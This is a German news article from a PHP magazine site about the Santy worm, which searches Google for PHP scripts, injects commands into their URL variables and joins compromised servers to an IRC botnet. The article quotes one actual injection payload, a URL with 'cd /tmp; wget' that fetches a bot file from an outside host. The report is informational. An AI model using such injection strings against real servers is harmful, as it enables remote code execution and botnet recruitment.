1. PHP Magazin
  2. Software & Web-Development
  3. Wurm attackiert PHP-Skripte

Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Ratings

There are no comments available yet.

Here you can write a comment


Please enter at least 10 characters.
Loading... Please wait.
* Pflichtangabe

Related topics

Power-over-Ethernet-Standard verabschiedet

Das IEEE (Institute of Electrical and Electronics Engineers) hat die aktualisierte Version des Power-over-Ethernet-Standards IEEE 802.3af-2003 (PoE) verabschiedet. Vorteile des neuen IEEE 802.3af-Standards: Voice-over-IP-Telefon beispielsweise fun ...

admin

Autor : admin
Category: Software & Web-Development

.NET für Linux und Unix

Ximian kündigte jetzt unter dem Namen "Mono Project" eine Linux-basierte Open-Source-Implementation von Microsofts .NET-Entwicklungsplattform an. Das Mono Project soll .NET-kompatible Komponenten wie einen C# Compiler, einen Common Language Runtime JIT-Co ...

admin

Autor : admin
Category: Software & Web-Development

How to optimize the speed of WordPress?

One of the most important factors is the loading time of a website. A slower loading time ensures a better ranking on Google, while a website that is too slow leads to dissatisfied visitors. ...

maxi11

Autor : maxi11
Category: Hosting & Technology

DENIC begrenzt Zugriff auf Domaindaten

Durch ein automatisches System will die DENIC ab 1. Juli die Zahl der whois-Abfragen in einem bestimmten Zeitintervall begrenzen und damit Massenabfragen verhindern. Damit will die DENIC Domaininhaber besser vor einer automatisierten Verwertung ihrer Adre ...

admin

Autor : admin
Category: Software & Web-Development

Sicherheitslücken in phpBB behoben

Die phpBB-Entwickler schließen mit der Version 2.0.22 der Forensoftware einige Sicherheitslücken. Zudem gab es noch einige kosmetische Fehlerbereinigungen. Die Entwickler empfehlen allen Nutzern, phpBB baldmöglichst zu aktualisieren. ...

admin

Autor : admin
Category: Software & Web-Development

Projektmanagement Damals und Heute

Werfen Sie einen Blick auf das, was sich verändert hat, und entdecken Sie, wo die Zukunft dieses Gebietes hinsteuert. ...

admin

Autor : admin
Category: PHP Magazin

Magazin & Tutorials
StepStone
Finde den richtigen Job
Düsseldorf, Deutschland

Publish a press release

Share your news and information

Share your news and information with others

You want to inform other users about an interesting IT topic, then sign up now and share it with our PHP community

learn more

Publish a press release